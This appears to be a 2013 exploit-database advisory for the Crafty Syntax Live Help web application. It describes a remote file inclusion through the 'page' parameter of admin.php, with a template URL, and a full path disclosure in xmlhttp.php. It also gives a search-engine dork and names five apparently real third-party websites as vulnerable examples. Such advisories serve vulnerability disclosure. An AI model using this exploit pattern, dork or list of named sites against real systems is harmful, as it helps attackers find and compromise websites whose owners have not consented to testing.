# Exploit Title : Crafty Syntax Live Help <= (2.*.* & 3.*.*) RFI + Path Disclosure
# Date : 4/19/2013
# Author : ITTIHACK
# Home : http://ittihack.com
# Vendor : http://www.craftysyntax.com
# Download : http://www.craftysyntax.com/craftysyntax3.4.1.zip
# Version : 2.* and 3.* , All versions
# Category : webapps
# Google dork : NA
# Tested on : Windows 7 + Apache server
# Description :Crafty Syntax Live Help is a live support application.
highlighted features include the ability to create your own questions,
auto inviting visitors, referrer tracking, page tracking.. and more
===========================================================================
1) Remote File Include : admin.php
if(!(isset($UNTRUSTED['page']))){ $UNTRUSTED['page'] = "scratch.php"; }
http://localhost/path/admin.php?page=[RFI]
===========================================================================
2) Full Path Disclosure: xmlhttp.php
Dork: inurl:"/xmlhttp.php" Notice: Undefined index: whattodo in
http://www.roderickrowser.com/livehelp/xmlhttp.php
http://www.rupeemail.net/livehelp/xmlhttp.php
http://www.michaelroselli.com/cslh/xmlhttp.php
http://www.recomende.com/ajuda/xmlhttp.php
http://www.camilodossantos.com.br/suporte/xmlhttp.php
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information